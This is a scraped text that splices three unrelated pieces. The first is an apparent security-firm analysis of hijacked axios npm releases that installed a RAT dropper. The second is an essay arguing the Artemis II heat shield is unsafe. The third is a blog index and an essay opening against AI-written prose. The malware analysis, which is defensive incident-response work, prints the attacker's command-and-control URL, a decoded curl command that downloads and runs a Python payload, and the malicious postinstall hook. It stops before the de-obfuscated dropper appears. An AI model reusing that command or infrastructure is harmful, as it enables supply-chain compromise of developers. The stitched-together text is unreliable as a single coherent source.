Hijacked main­tainer ac­count used to pub­lish poi­soned ax­ios re­leases in­clud­ing 1.14.1 and 0.30.4. The at­tacker in­jected a hid­den de­pen­dency that drops a cross plat­form RAT. We are ac­tively in­ves­ti­gat­ing and will up­date this post with a full tech­ni­cal analy­sis. StepSecurity is host­ing a com­mu­nity town hall on this in­ci­dent on April 1st at 10:00 AM PT - Register Here.axios is the most pop­u­lar JavaScript HTTP client li­brary with over 100 mil­lion weekly down­loads. On March 30, 2026, StepSecurity iden­ti­fied two ma­li­cious ver­sions of the widely used ax­ios HTTP client li­brary pub­lished to npm: ax­ios@1.14.1 and ax­ios@0.30.4. The ma­li­cious ver­sions in­ject a new de­pen­dency, plain-crypto-js@4.2.1, which is never im­ported any­where in the ax­ios source code. Its sole pur­pose is to ex­e­cute a postin­stall script that acts as a cross plat­form re­mote ac­cess tro­jan (RAT) drop­per, tar­get­ing ma­cOS, Windows, and Linux. The drop­per con­tacts a live com­mand and con­trol server and de­liv­ers plat­form spe­cific sec­ond stage pay­loads. After ex­e­cu­tion, the mal­ware deletes it­self and re­places its own pack­age.json with a clean ver­sion to evade foren­sic de­tec­tion.There are zero lines of ma­li­cious code in­side ax­ios it­self, and that’s ex­actly what makes this at­tack so dan­ger­ous. Both poi­soned re­leases in­ject a fake de­pen­dency, plain-crypto-js@4.2.1, a pack­age never im­ported any­where in the ax­ios source, whose sole pur­pose is to run a postin­stall script that de­ploys a cross-plat­form re­mote ac­cess tro­jan. The drop­per con­tacts a live com­mand-and-con­trol server, de­liv­ers sep­a­rate sec­ond-stage pay­loads for ma­cOS, Windows, and Linux, then erases it­self and re­places its own pack­age.json with a clean de­coy. A de­vel­oper who in­spects their node_­mod­ules folder af­ter the fact will find no in­di­ca­tion any­thing went wrong.This was not op­por­tunis­tic. It was pre­ci­sion. The ma­li­cious de­pen­dency was staged 18 hours in ad­vance. Three pay­loads were pre-built for three op­er­at­ing sys­tems. Both re­lease branches were poi­soned within 39 min­utes of each other. Every ar­ti­fact was de­signed to self-de­struct. Within two sec­onds of npm in­stall, the mal­ware was al­ready call­ing home to the at­tack­er’s server be­fore npm had even fin­ished re­solv­ing de­pen­den­cies. This is among the most op­er­a­tionally so­phis­ti­cated sup­ply chain at­tacks ever doc­u­mented against a top-10 npm pack­age.These com­pro­mises were de­tected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have re­spon­si­bly dis­closed the is­sue to the pro­ject main­tain­ers.StepSe­cu­rity Harden-Runner, whose com­mu­nity tier is free for pub­lic re­pos and is used by over 12,000 pub­lic repos­i­to­ries, de­tected the com­pro­mised ax­ios pack­age mak­ing anom­alous out­bound con­nec­tions to the at­tack­er’s C2 do­main across mul­ti­ple open source pro­jects. For ex­am­ple, Harden-Runner flagged the C2 call­back to sfr­clak.com:8000 dur­ing a rou­tine CI run in the back­stage repos­i­tory, one of the most widely used de­vel­oper por­tal frame­works. The Backstage team has con­firmed that this work­flow is in­ten­tion­ally sand­boxed and the ma­li­cious pack­age in­stall does not im­pact the pro­ject. The con­nec­tion was au­to­mat­i­cally marked as anom­alous be­cause it had never ap­peared in any prior work­flow run. Harden-Runner in­sights for com­mu­nity tier pro­jects are pub­lic by de­sign, al­low­ing any­one to ver­ify the de­tec­tion: https://​app.stepse­cu­rity.io/​github/​back­stage/​back­stage/​ac­tions/​runs/​23775668703?tab=net­work-events

[Community Webinar] ax­ios Compromised on npm: What We Know, What You Should Do

Join StepSecurity on April 1st at 10:00 AM PT for a live com­mu­nity brief­ing on the ax­ios sup­ply chain at­tack. We’ll walk through the full at­tack chain, in­di­ca­tors of com­pro­mise, re­me­di­a­tion steps, and open it up for Q&A.

Register for the we­bi­nar →

The at­tack was pre-staged across roughly 18 hours, with the ma­li­cious de­pen­dency seeded on npm be­fore the ax­ios re­leases to avoid “brand-new pack­age” alarms from se­cu­rity scan­ners:

plain-crypto-js@4.2.0 pub­lished by nr­wise@pro­ton.me — a clean de­coy con­tain­ing a full copy of the le­git­i­mate crypto-js source, no postin­stall hook. Its sole pur­pose is to es­tab­lish npm pub­lish­ing his­tory so the pack­age does not ap­pear as a zero-his­tory ac­count dur­ing later in­spec­tion.

plain-crypto-js@4.2.1 pub­lished by nr­wise@pro­ton.me — ma­li­cious pay­load added. The postin­stall: “node setup.js” hook and ob­fus­cated drop­per are in­tro­duced.

ax­ios@1.14.1 pub­lished by com­pro­mised ja­son­saay­man ac­count (email: if­stap@pro­ton.me) — in­jects plain-crypto-js@4.2.1 as a run­time de­pen­dency, tar­get­ing the mod­ern 1.x user base.

ax­ios@0.30.4 pub­lished by the same com­pro­mised ac­count — iden­ti­cal in­jec­tion into the legacy 0.x branch, pub­lished 39 min­utes later to max­i­mize cov­er­age across both re­lease lines.

npm un­pub­lishes ax­ios@1.14.1 and ax­ios@0.30.4. Both ver­sions are re­moved from the reg­istry and the lat­est dist-tag re­verts to 1.14.0. ax­ios@1.14.1 had been live for ap­prox­i­mately 2 hours 53 min­utes; ax­ios@0.30.4 for ap­prox­i­mately 2 hours 15 min­utes. Timestamp is in­ferred from the ax­ios reg­istry doc­u­men­t’s mod­i­fied field (03:15:30Z) — npm does not ex­pose a ded­i­cated per-ver­sion un­pub­lish time­stamp in its pub­lic API.

npm ini­ti­ates a se­cu­rity hold on plain-crypto-js, be­gin­ning the process of re­plac­ing the ma­li­cious pack­age with an npm se­cu­rity-holder stub.

npm pub­lishes the se­cu­rity-holder stub plain-crypto-js@0.0.1-se­cu­rity.0 un­der the npm@npmjs.com ac­count, for­mally re­plac­ing the ma­li­cious pack­age on the reg­istry. plain-crypto-js@4.2.1 had been live for ap­prox­i­mately 4 hours 27 min­utes. Attempting to in­stall any ver­sion of plain-crypto-js now re­turns the se­cu­rity no­tice.

The at­tacker com­pro­mised the ja­son­saay­man npm ac­count, the pri­mary main­tainer of the ax­ios pro­ject. The ac­coun­t’s reg­is­tered email was changed to if­stap@pro­ton.me — an at­tacker-con­trolled ProtonMail ad­dress. Using this ac­cess, the at­tacker pub­lished ma­li­cious builds across both the 1.x and 0.x re­lease branches si­mul­ta­ne­ously, max­i­miz­ing the num­ber of pro­jects ex­posed.Both ax­ios@1.14.1 and ax­ios@0.30.4 are recorded in the npm reg­istry as pub­lished by ja­son­saay­man, mak­ing them in­dis­tin­guish­able from le­git­i­mate re­leases at a glance. Both ver­sions were pub­lished us­ing the com­pro­mised npm cre­den­tials of a lead ax­ios main­tainer, by­pass­ing the pro­jec­t’s nor­mal GitHub Actions CI/CD pipeline.A crit­i­cal foren­sic sig­nal is vis­i­ble in the npm reg­istry meta­data. Every le­git­i­mate ax­ios 1.x re­lease is pub­lished via GitHub Actions with npm’s OIDC Trusted Publisher mech­a­nism, mean­ing the pub­lish is cryp­to­graph­i­cally tied to a ver­i­fied GitHub Actions work­flow. ax­ios@1.14.1 breaks that pat­tern en­tirely — pub­lished man­u­ally via a stolen npm ac­cess to­ken with no OIDC bind­ing and no git­Head:// ax­ios@1.14.0 — LEGITIMATE

“_npmUser”: {

“name”: “GitHub Actions”,

“email”: “npm-oidc-no-re­ply@github.com”,

“trustedPublisher”: {

“id”: “github”,

“oidcConfigId”: “oidc:9061ef30-3132-49f4-b28c-9338d192a1a9″

// ax­ios@1.14.1 — MALICIOUS

“_npmUser”: {

“name”: “jasonsaayman”,

“email”: “if­stap@pro­ton.me”

// no trust­ed­Pub­lisher, no git­Head, no cor­re­spond­ing GitHub com­mit or tag

}There is no com­mit or tag in the ax­ios GitHub repos­i­tory that cor­re­sponds to 1.14.1. The re­lease ex­ists only on npm. The OIDC to­ken that le­git­i­mate re­leases use is ephemeral and scoped to the spe­cific work­flow — it can­not be stolen. The at­tacker must have ob­tained a long-lived clas­sic npm ac­cess to­ken for the ac­count.Be­fore pub­lish­ing the ma­li­cious ax­ios ver­sions, the at­tacker pre-staged plain-crypto-js@4.2.1 from ac­count nr­wise@pro­ton.me. This pack­age:Mas­quer­ades as crypto-js with an iden­ti­cal de­scrip­tion and repos­i­tory URL point­ing to the le­git­i­mate brix/​crypto-js GitHub repos­i­to­ryCon­tains “postinstall”: “node setup.js” — the hook that fires the RAT drop­per on in­stall­Pre-stages a clean pack­age.json stub in a file named pack­age.md for ev­i­dence de­struc­tion af­ter ex­e­cu­tion­The de­coy ver­sion (4.2.0) was pub­lished 18 hours ear­lier to es­tab­lish pub­lish­ing his­tory - a clean pack­age in the reg­istry that makes nr­wise look like a le­git­i­mate main­tainer.What changed be­tween 4.2.0 (decoy) and 4.2.1 (malicious)A com­plete file-level com­par­i­son be­tween plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 re­veals ex­actly three dif­fer­ences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is iden­ti­cal be­tween the two ver­sions:

The 56 crypto source files are not just sim­i­lar; they are bit-for-bit iden­ti­cal to the cor­re­spond­ing files in the le­git­i­mate crypto-js@4.2.0 pack­age pub­lished by Evan Vosberg. The at­tacker made no mod­i­fi­ca­tions to the cryp­to­graphic li­brary code what­so­ever. This was in­ten­tional: any diff-based analy­sis com­par­ing plain-crypto-js against crypto-js would find noth­ing sus­pi­cious in the li­brary files and would fo­cus at­ten­tion on pack­age.json — where the postin­stall hook looks, at a glance, like a stan­dard build or setup task.The anti-foren­sics stub (package.md) de­serves par­tic­u­lar at­ten­tion. After setup.js runs, it re­names pack­age.md to pack­age.json. The stub re­ports ver­sion 4.2.0 — not 4.2.1:// Contents of pack­age.md (the clean re­place­ment stub)

“name”: “plain-crypto-js”,

“version”: “4.2.0″, // ← re­ports 4.2.0, not 4.2.1 — de­lib­er­ate mis­match

“description”: “JavaScript li­brary of crypto stan­dards.”,

“license”: “MIT”,

“author”: { “name”: “Evan Vosberg”, “url”: “http://​github.com/​evan­vos­berg” },

“homepage”: “http://​github.com/​brix/​crypto-js”,

“repository”: { “type”: “git”, “url”: “http://​github.com/​brix/​crypto-js.git” },

“main”: “index.js”,

// No “scripts” key — no postin­stall, no test

“dependencies”: {}

}This cre­ates a sec­ondary de­cep­tion layer. After in­fec­tion, run­ning npm list in the pro­ject di­rec­tory will re­port plain-crypto-js@4.2.0 — be­cause npm list reads the ver­sion field from the in­stalled pack­age.json, which now says 4.2.0. An in­ci­dent re­spon­der check­ing in­stalled pack­ages would see a ver­sion num­ber that does not match the ma­li­cious 4.2.1 ver­sion they were told to look for, po­ten­tially lead­ing them to con­clude the sys­tem was not com­pro­mised.# What npm list re­ports POST-infection (after the pack­age.json swap):

$ npm list plain-crypto-js

mypro­ject@1.0.0

└── plain-crypto-js@4.2.0 # ← re­ports 4.2.0, not 4.2.1

# but the drop­per al­ready ran as 4.2.1

# The re­li­able check is the DIRECTORY PRESENCE, not the ver­sion num­ber:

$ ls node_­mod­ules/​plain-crypto-js

aes.js ci­pher-core.js core.js …

# If this di­rec­tory ex­ists at all, the drop­per ran.

# plain-crypto-js is not a de­pen­dency of ANY le­git­i­mate ax­ios ver­sion.The dif­fer­ence be­tween the real crypto-js@4.2.0 and the ma­li­cious plain-crypto-js@4.2.1 is a sin­gle field in pack­age.json:// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)

“name”: “crypto-js”,

“version”: “4.2.0″,

“description”: “JavaScript li­brary of crypto stan­dards.”,

“author”: “Evan Vosberg”,

“homepage”: “http://​github.com/​brix/​crypto-js”,

“scripts”: {

“test”: “grunt” // ← no postin­stall

// plain-crypto-js@4.2.1 (MALICIOUS — nr­wise@pro­ton.me)

“name”: “plain-crypto-js”, // ← dif­fer­ent name, every­thing else cloned

“version”: “4.2.1″, // ← ver­sion one ahead of the real pack­age

“description”: “JavaScript li­brary of crypto stan­dards.”,

“author”: { “name”: “Evan Vosberg” }, // ← fraud­u­lent use of real au­thor name

“homepage”: “http://​github.com/​brix/​crypto-js”, // ← real repo, wrong pack­age

“scripts”: {

“test”: “grunt”,

“postinstall”: “node setup.js” // ← THE ONLY DIFFERENCE. The en­tire weapon.

}The at­tacker pub­lished ax­ios@1.14.1 and ax­ios@0.30.4 with plain-crypto-js: “^4.2.1” added as a run­time de­pen­dency — a pack­age that has never ap­peared in any le­git­i­mate ax­ios re­lease. The diff is sur­gi­cal: every other de­pen­dency is iden­ti­cal to the prior clean ver­sion.When a de­vel­oper runs npm in­stall ax­ios@1.14.1, npm re­solves the de­pen­dency tree and in­stalls plain-crypto-js@4.2.1 au­to­mat­i­cally. npm then ex­e­cutes plain-crypto-js’s postin­stall script, launch­ing the drop­per.Phan­tom de­pen­dency: A grep across all 86 files in ax­ios@1.14.1 con­firms that plain-crypto-js is never im­ported or re­quire()’d any­where in the ax­ios source code. It is added to pack­age.json only to trig­ger the postin­stall hook. A de­pen­dency that ap­pears in the man­i­fest but has zero us­age in the code­base is a high-con­fi­dence in­di­ca­tor of a com­pro­mised re­lease.The Surgical Precision of the InjectionA com­plete bi­nary diff be­tween ax­ios@1.14.0 and ax­ios@1.14.1 across all 86 files (excluding source maps) re­veals that ex­actly one file changed: pack­age.json. Every other file — all 85 li­brary source files, type de­f­i­n­i­tions, README, CHANGELOG, and com­piled dist bun­dles — is bit-for-bit iden­ti­cal be­tween the two ver­sions.# File diff: ax­ios@1.14.0 vs ax­ios@1.14.1 (86 files, source maps ex­cluded)

DIFFERS: pack­age.json

Total dif­fer­ing files: 1

Files only in 1.14.1: (none)

Files only in 1.14.0: (none)# –- ax­ios/​pack­age.json (1.14.0)

# +++ ax­ios/​pack­age.json (1.14.1)

- “version”: “1.14.0″,

+ “version”: “1.14.1″,

“scripts”: {

“fix”: “eslint –fix lib/**/*.​js”,

- “prepare”: “husky”

“dependencies”: {

“follow-redirects”: “^2.1.0″,

“form-data”: “^4.0.1″,

“proxy-from-env”: “^2.1.0″,

+ “plain-crypto-js”: “^4.2.1″

}Two changes are vis­i­ble: the ver­sion bump (1.14.0 → 1.14.1) and the ad­di­tion of plain-crypto-js. There is also a third, less ob­vi­ous change: the “prepare”: “husky” script was re­moved. husky is the git hook man­ager used by the ax­ios pro­ject to en­force pre-com­mit checks. Its re­moval from the scripts sec­tion is con­sis­tent with a man­ual pub­lish that by­passed the nor­mal de­vel­op­ment work­flow — the at­tacker edited pack­age.json di­rectly with­out go­ing through the pro­jec­t’s stan­dard re­lease tool­ing, which would have re-added the husky pre­pare script.The same analy­sis ap­plies to ax­ios@0.30.3 → ax­ios@0.30.4:# –- ax­ios/​pack­age.json (0.30.3)

# +++ ax­ios/​pack­age.json (0.30.4)

- “version”: “0.30.3″,

+ “version”: “0.30.4″,

“dependencies”: {

“follow-redirects”: “^1.15.4″,

“form-data”: “^4.0.4″,

“proxy-from-env”: “^1.1.0″,

+ “plain-crypto-js”: “^4.2.1″

}Again — ex­actly one sub­stan­tive change: the ma­li­cious de­pen­dency in­jec­tion. The ver­sion bump it­self (from 0.30.3 to 0.30.4) is sim­ply the re­quired npm ver­sion in­cre­ment to pub­lish a new re­lease; it car­ries no func­tional sig­nif­i­cance.setup.js is a sin­gle mini­fied file em­ploy­ing a two-layer ob­fus­ca­tion scheme de­signed to evade sta­tic analy­sis tools and con­fuse hu­man re­view­ers.All sen­si­tive strings — mod­ule names, OS iden­ti­fiers, shell com­mands, the C2 URL, and file paths — are stored as en­coded val­ues in an ar­ray named stq[]. Two func­tions de­code them at run­time:_tran­s_1(x, r) — XOR ci­pher. The key “OrDeR_7077” is parsed through JavaScript’s Number(): al­pha­betic char­ac­ters pro­duce NaN, which in bit­wise op­er­a­tions be­comes 0. Only the dig­its 7, 0, 7, 7 in po­si­tions 6–9 sur­vive, giv­ing an ef­fec­tive key of [0,0,0,0,0,0,7,0,7,7]. Each char­ac­ter at po­si­tion r is de­coded as:char­Code XOR key[(7 × r × r) % 10] XOR 333_trans_2(x, r) — Outer layer. Reverses the en­coded string, re­places _ with =, base64-de­codes the re­sult (interpreting the bytes as UTF-8 to re­cover Unicode code points), then passes the out­put through _trans_1.The drop­per’s en­try point is _entry(“6202033″), where 6202033 is the C2 URL path seg­ment. The full C2 URL is: http://​sfr­clak.com:8000/​6202033StepSe­cu­rity fully de­coded every en­try in the stq[] ar­ray. The re­cov­ered plain­text re­veals the com­plete at­tack:stq[0] → “child_process” // shell ex­e­cu­tion

stq[1] → “os” // plat­form de­tec­tion

stq[2] → “fs” // filesys­tem op­er­a­tions

stq[3] → “http://​sfr­clak.com:8000/” // C2 base URL

stq[5] → “win32” // Windows plat­form iden­ti­fier

stq[6] → “darwin” // ma­cOS plat­form iden­ti­fier

stq[12] → “curl -o /tmp/ld.py -d pack­ages.npm.org/​pro­duct2 -s SCR_LINK && no­hup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &”

stq[13] → “package.json” // deleted af­ter ex­e­cu­tion

stq[14] → “package.md” // clean stub re­named to pack­age.json

stq[15] → ”.exe”

stq[16] → ”.ps1″

stq[17] → ”.vbs”The com­plete at­tack path from npm in­stall to C2 con­tact and cleanup, across all three tar­get plat­forms.With all strings de­coded, the drop­per’s full logic can be re­con­structed and an­no­tated. The fol­low­ing is a de-ob­fus­cated, com­mented ver­sion of the _entry() func­tion that con­sti­tutes the en­tire drop­per pay­load. Original vari­able names are pre­served; com­ments are added for clar­ity.// setup.js — de-ob­fus­cated and an­no­tated

// SHA-256: e10b1­fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09

Artemis II Is Not Safe to Fly

“Our test fa­cil­i­ties can’t reach the com­bi­na­tion of heat flux, pres­sure, shear stresses, etc., that an ac­tual reen­ter­ing space­craft does. We’re al­ways hav­ing to wait for the flight test to get the fi­nal cer­ti­fi­ca­tion that our sys­tem is good to go.”—Je­remy VanderKam, deputy man­ager for Orion’s heat shield, speak­ing in 2022

On Wednesday, NASA will at­tempt to send four as­tro­nauts around the moon on a mis­sion called Artemis II. This will be sec­ond flight of NASA’s SLS rocket, and the first time the 20-year-old Orion cap­sule flies with peo­ple on board.

The trou­ble is that the heat shield on Orion blows chunks. Not in some fig­u­ra­tive, pe­jo­ra­tive sense, but in the sense that when NASA flew this ex­act mis­sion in 2022, large pieces of ma­te­r­ial blew out of Orion’s heat shield dur­ing re-en­try, leav­ing div­ots. Large bolts em­bed­ded in the heat shield also par­tially eroded and melted through.

NASA’s ini­tial in­stinct was to cover up the prob­lem. In early press re­leases, they stressed that both rocket and space­craft had per­formed ex­cep­tion­ally, while de­clin­ing to pub­lish the post-flight as­sess­ment re­view. The first men­tion of heat shield dam­age came from Orion pro­gram man­ager Howard Hu on a call with re­porters in March of 2023. Hu said: “we ob­served there were more vari­a­tions across the heat shield than we ex­pected; some of the ex­pected char ma­te­r­ial that we would ex­pect com­ing back home ab­lated away dif­fer­ently than what our com­puter mod­els and what our ground test­ing pre­dicted.”

Asked by a jour­nal­ist to quan­tify the char loss in a January 2024 phone call, Moon-to-Mars Deputy Administrator Amit Kshatriya said: “it was very small lo­cal­ized ar­eas. Interestingly, it would be much eas­ier for us to an­a­lyze if we had larger chunks and it was more de­fined”. A Lockheed Martin rep­re­sen­ta­tive on the same call added that “there was a healthy mar­gin re­main­ing of that vir­gin Avcoat. So it was­n’t like there were large, large chunks.”

It was­n’t un­til May 2024, when the Office of the Inspector General re­leased pho­tographs of the heat shield, that the ex­tent of the dam­age be­came clear. The prob­lem was­n’t char loss or ex­ces­sive ab­la­tion, but deep gouges and holes in many of the Avcoat blocks that com­prise the heat shield.

The Avcoat ma­te­r­ial is not de­signed to come out in chunks. It is sup­posed to char and flake off smoothly, main­tain­ing the over­all con­tours of the heat shield. But Orion is a fat and heavy space­craft, about twice as heavy as the Apollo com­mand mod­ule it is mod­eled af­ter. And the Avcoat heat shield is an ex­per­i­men­tal de­sign. No one has flown a seg­mented heat shield like this at lu­nar re­turn speeds, let alone on a space­craft this heavy.

The sub­stance of the OIG re­port was as alarm­ing as the pic­tures. The OIG iden­ti­fied three is­sues that could po­ten­tially kill the crew on Artemis II:

Heat shield spalling. This is the tech­ni­cal term for all those div­ots. Since spalling leaves voids and gaps in the heat shield ma­te­r­ial, it can ex­pose the un­pro­tected body of the cap­sule and lead to burn­through. Spalling also changes the pat­tern of hy­per­sonic air­flow around the cap­sule, cre­at­ing the po­ten­tial for lo­cal­ized hot spots and cas­cad­ing ef­fects.

Impact from heat shield frag­ments. When spalling sends pieces of heat shield into the hy­per­sonic airstream, they can strike the top of the cap­sule, dam­ag­ing the para­chute com­part­ment. Whether this hap­pened on Artemis I is un­known. As the OIG re­port pointed out with some frus­tra­tion, NASA failed to re­cover ei­ther the para­chutes or the para­chute cover, de­spite mak­ing elab­o­rate plans to do so. Any ev­i­dence of de­bris im­pact is now at the bot­tom of the Pacific Ocean.

Bolt ero­sion. The OIG re­port noted ero­sion and melt­ing in four large sep­a­ra­tion bolts that sit em­bed­ded in the heat shield. These bolts are packed with a heat-re­sis­tant ma­te­r­ial and are sup­posed to be rugged enough to sur­vive re-en­try. But three of the four bolts had melted through, due to a flaw in the heat­ing model NASA had used in de­sign­ing them. The re­port fur­ther noted: ”separation bolt melt be­yond the ther­mal bar­rier dur­ing reen­try can ex­pose the ve­hi­cle to hot gas in­ges­tion be­hind the heat shield, ex­ceed­ing Orion’s struc­tural lim­its and re­sult­ing in the breakup of the ve­hi­cle and loss of crew.”

So Orion had come back from the moon with dam­age se­vere enough to kill a crew three dif­fer­ent ways. Not good!

This left NASA in a quandary. The Orion cap­sule for Artemis II was al­ready mated to its ser­vice mod­ule. Taking it off to make changes to the heat shield, even if the agency knew what changes to make, would take years. Nor was there room in the sched­ule to con­duct a flight test, or any spare hard­ware to con­duct the flight test with. Each Orion costs north of a bil­lion dol­lars, and the only rocket it can launch on (SLS) costs two to four bil­lion dol­lars a shot, de­pend­ing on how you do the ac­count­ing.

Here it’s worth quot­ing Admiral Harlold Gehman, who chaired the Columbia Accident Investigation board, on what hap­pens or­ga­ni­za­tion­ally when a rigid sched­ule meets an im­mov­able bud­get:

If a pro­gram man­ager is faced with prob­lems and short­falls and chal­lenges, if the sched­ule can­not be ex­tended, he ei­ther needs money, or he needs to cut into mar­gin. There were no other op­tions, so guess what the peo­ple at NASA did? They started to cut into mar­gins. No one di­rected them to do this. No one told them to do this. The or­ga­ni­za­tion did it, be­cause the in­di­vid­u­als in the or­ga­ni­za­tion thought they were de­fend­ing the or­ga­ni­za­tion. They thought they were do­ing what the or­ga­ni­za­tion wanted them to do.

And so NASA looked for ways to talk it­self into be­liev­ing it was safe to fly a de­fec­tive heat shield.

In April 2024, the agency con­vened an in­de­pen­dent re­view panel. The find­ings of that panel were not made pub­lic, but in December NASA an­nounced that it had found a root cause for the heat shield dam­age. The Avcoat on the Artemis I heat shield was not suf­fi­ciently per­me­able, and so gas trapped un­der lay­ers of the ma­te­r­ial had ex­panded and blown pieces out of the heat shield. The process had been ex­ac­er­bated by the re-en­try tra­jec­tory, which had heat­ing oc­cur in two dis­tinct phases.

This was an awk­ward find­ing, since the heat shield NASA would use on Artemis II had been made even less per­me­able, to make it eas­ier to do ul­tra­sonic test­ing. But you fly with the heat shield you have, and the agency said it was con­fi­dent that a change to the re-en­try tra­jec­tory would be more than ad­e­quate to off­set any spalling is­sues.

Somewhat con­fus­ingly, they also an­nounced their in­ten­tion to switch to a new heat shield de­sign, start­ing with Artemis III. In other words, the Artemis II shield was com­pletely safe to fly, but they were never go­ing to fly it af­ter this mis­sion, and the re­place­ment de­sign would be tested for the first time on a fu­ture lu­nar mis­sion, with as­tro­nauts on board.

All of this was kind of pre­pos­ter­ous. As the YouTuber Eager Space has pointed out, if a com­mer­cial crew cap­sule (SpaceX Dragon or Boeing Starliner) re­turned to Earth with the kind of dam­age seen on Orion, NASA would in­sist on a re­design and an un­manned test flight to val­i­date it. But the agency does not hold its flag­ship pro­gram to the high stan­dard it de­mands from com­mer­cial crew, even though the same as­tro­naut lives are at stake.

Nor was it lost on ob­servers that the tools and mod­els NASA used to ar­rive at its new analy­sis were the same ones that had failed to pre­dict the spalling prob­lem in the first place. While the agency was able to work back­wards from flight data to in­duce flak­ing in a test coupon of Avcoat, they had no way of pre­dict­ing how the full-size heat shield would be­have in the new flight con­di­tions it would ex­pe­ri­ence on Artemis II.

You don’t have to be a ran­dom space blog­ger to find all this fishy. The most en­er­getic voice of pub­lic dis­sent has been heat shield ex­pert and Shuttle as­tro­naut Charles Camarda, the for­mer Director of Engineering at Johnson Space Center. Aghast at what he saw as a re­peat of the mo­ti­vated rea­son­ing that had led to the loss of Columbia and Challenger, Camarda be­gan mak­ing noise both in­side and out­side the agency, be­liev­ing that as­tro­nauts’ lives were at stake.

In a show of open­ness, NASA in­vited Camarda and two jour­nal­ists to at­tend a brief­ing on the heat shield in January of 2026, and gave him lim­ited ac­cess to some re­search ma­te­ri­als that have not been made pub­lic. But the ex­pe­ri­ence only deep­ened Camarda’s dis­tress, and he ended up pub­lish­ing a cri de coeur that I en­cour­age every­one to read in full.

In a nut­shell, Camarda ar­gues that NASA is demon­strat­ing the same dys­func­tion that led to the Columbia and Challenger dis­as­ters. Faced with an un­ex­pected en­gi­neer­ing fail­ure, it has built toy mod­els to con­vince it­self that the con­clu­sion it wants to reach (it’s safe to fly) are sup­ported by ev­i­dence. These toy mod­els are not grounded in physics, but be­cause they ap­pear to be quan­ti­ta­tive, they cre­ate a false sense of se­cu­rity and un­der­stand­ing, an epis­temic fig leaf for man­age­ment to hide be­hind.

Put more sim­ply, NASA is go­ing to fly Artemis II based on vibes, hop­ing that what­ever hap­pened to the heat shield on Artemis I won’t get bad enough to harm the crew on Artemis II.

A screen shot from re-en­try dur­ing Artemis I, show­ing a large burn­ing frag­ment of the Orion heat shield

What makes the sit­u­a­tion even more frus­trat­ing is the fact that, by the pro­gram’s own logic, there’s no rea­son to fly Artemis II with a crew at all.

In the orig­i­nal scheme for Artemis, Artemis II was the only op­por­tu­nity to fly Orion with as­tro­nauts on board be­fore the lu­nar land­ing at­tempt on Artemis III. Artemis III would be a scary mis­sion full of tech­ni­cal firsts (first land­ing, first use of the lu­nar lan­der, first dock­ing in deep space, etc), and it made sense to re­tire as much tech­ni­cal risk as pos­si­ble on a dry run around the Moon.

But in early 2026, NASA de­cided to add an ad­di­tional Artemis mis­sion to the man­i­fest. The new Artemis III would fly in 2027 as a near-Earth mis­sion to test dock­ing with what­ever lu­nar lan­der (Blue Origin or SpaceX) was avail­able. The first moon land­ing would be pushed back to the mis­sion af­ter that, Artemis IV.

This change re­moved any ra­tio­nale for fly­ing as­tro­nauts on Artemis II. If there are is­sues with Orion, it is safer for the crew to en­counter them in Earth or­bit than on a long trip around the Moon. And Artemis II could fly just as eas­ily with­out as­tro­nauts on board, giv­ing ground con­trollers launch ex­pe­ri­ence and val­i­dat­ing (or dis­cred­it­ing) NASA’s heat shield model with­out en­dan­ger­ing a crew. NASA would lose a lit­tle face by es­sen­tially re­peat­ing Artemis I, but do­ing so would demon­strate that the agency re­ally be­lieves in the safety cul­ture it so of­ten gives lip ser­vice to.

Unfortunately, it looks like sunk costs and is­sues of face will win the day.

The en­gi­neers and man­agers at NASA are not stu­pid, and they are not cav­a­lier with as­tro­naut’s lives. They’ve read the Rogers Commission and CAIB re­ports, and many of them re­mem­ber Challenger and Columbia first­hand. But they ex­ist in a con­text.

That con­text is a moon pro­gram that has spent close to $100 bil­lion and 25 years with noth­ing to show for it­self, at an agency that has just ex­pe­ri­enced mass fir­ings and been through a near-death ex­pe­ri­ence with its sci­ence bud­get. The charis­matic new Administrator has staked his rep­u­ta­tion on in­creas­ing launch ca­dence, and set an ex­plicit goal of land­ing as­tro­nauts on the Moon be­fore President Trump’s term ex­pires in January of 2029.

So peo­ple are ty­ing them­selves into pret­zels to avoid say­ing the ob­vi­ous, that the Orion heat shield needs a suc­cess­ful flight test at lu­nar re-en­try speeds to avoid un­ac­cept­able risks to the crew.

If the Artemis II crew dies dur­ing re-en­try, we’ll get an­other lav­ishly re­searched re­port lay­ing out con­trib­u­tory fac­tors that are plainly vis­i­ble to any­one fol­low­ing the pro­gram right now. The space pro­gram will be de­layed by years, wait­ing for in­ves­ti­ga­tions to fin­ish and the wrath of Congress to abate. NASA will beat it­self up and add more lay­ers of safety bu­reau­cracy, un­til the same pro­gram pres­sures lead it to make the same mis­take again on a fu­ture flight.

It’s likely—hope­fully very likely—that Artemis II will land safely. But do we re­ally have to wait for as­tro­nauts to die to re-learn the same lessons a third time?

Good luck and god­speed to the as­tro­nauts on Artemis II.

If you en­joy my writ­ing on space, I in­vite you to sub­scribe to my Substack, Mars for the Rest of Us, where I write weekly short es­says on top­ics around Mars ex­plo­ration.

Don’t Let AI Write For You Go does not al­low truthi­ness Simple Semaphore With a Buffered Channel in Go 🎙️, 🎙️ - Is this thing on? What hap­pens when you go to this site? Everything Useful I Know About kubectl Choosing the right scope func­tion in Kotlin What do data classes give you in Kotlin? How sim­i­lar is the ex­e­cu­tion of Java and JavaScript?

Don’t Let AI Write For You When you write a doc­u­ment or es­say, you are pos­ing a ques­tion and then an­swer­ing it. For ex­am­ple, a PRD an­swers the ques­tion, “What should we build?” A tech­ni­cal spec an­swers, “How should we build it?” Sometimes the ques­tion is more dif­fi­cult to an­swer—“What are we even try­ing to ac­com­plish?” And with every at­tempt at an­swer­ing, you re­flect on whether you’re ask­ing the right ques­tion.

But now, of course, we have LLMs. I’m see­ing an in­creas­ing amount of LLM-generated doc­u­ments, ar­ti­cles, and es­says. I want to cau­tion against this. Each LLM-generated doc­u­ment is a missed op­por­tu­nity to think and build trust.

The goal of writ­ing is not to have writ­ten. It is to have in­creased your un­der­stand­ing, and then the un­der­stand­ing of those around you. When you are tasked to write some­thing, your job is to go into the murk­i­ness and come out of it with struc­ture and un­der­stand­ing. To con­quer the un­known.

